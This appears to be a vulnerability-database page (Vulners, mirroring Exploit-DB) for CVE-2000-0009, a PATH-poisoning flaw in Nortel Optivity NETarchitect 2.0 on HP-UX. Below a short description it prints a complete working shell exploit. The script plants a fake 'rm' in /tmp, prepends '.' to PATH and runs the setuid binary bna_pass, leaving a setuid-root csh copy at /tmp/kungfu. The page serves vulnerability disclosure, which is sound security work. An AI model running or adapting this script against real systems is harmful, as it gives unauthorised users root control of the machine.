Lucene search
+L

Nortel Networks Optivity NETarchitect 2.0 - PATH

🗓️ 30 Dec 1999 00:00:00Reported by LoneguardType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Exploit enables root access via a path vulnerability in Nortel Networks NETarchitect application.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-0009
13 Oct 200004:00
cve
Cvelist
CVE-2000-0009
13 Oct 200004:00
cvelist
EUVD
EUVD-2000-0009
7 Oct 202500:30
euvd
NVD
CVE-2000-0009
29 Dec 199905:00
nvd
source: https://www.securityfocus.com/bid/907/info

NETarchitect is an application for simplifying the task of designing and deploying complex switched network system configurations, produced by Nortel Networks and usually shipped with the Optivity Network Configuration System suite of utilities. It is possible to gain root privileges on an HP-UX (possibly Solaris) system running NETarchitect by exploiting a path vulnerability in the binary /opt/bna/bin/bna_pass. bna_pass executes 'rm' assuming that the end user's PATH value is valid and the real rm binary is in the one being called.Because of this, it is possible to have bna_pass execute arbitrary binaries as root if the PATH variable is manipulated. A malicious user can add "." to his PATH environment variable and have binaries searched for and executed in . before any others [directories in PATH]. A false 'rm' would then be executed, compromising the system.

#!/bin/sh
#
# bna.sh - Loneguard 03/03/99
#
# Poision path xploit for Optivity NETarchitect on HPUX
#
cd /tmp
touch /usr/bna/tmp/.loginChk
PATH=.:$PATH;export PATH
cat > rm << _EOF
#!/bin/sh
cp /bin/csh /tmp/kungfu
chmod 4755 /tmp/kungfu
_EOF
chmod 755 /tmp/rm
/opt/bna/bin/bna_pass

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jul 2012 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.2
EPSS0.00819
25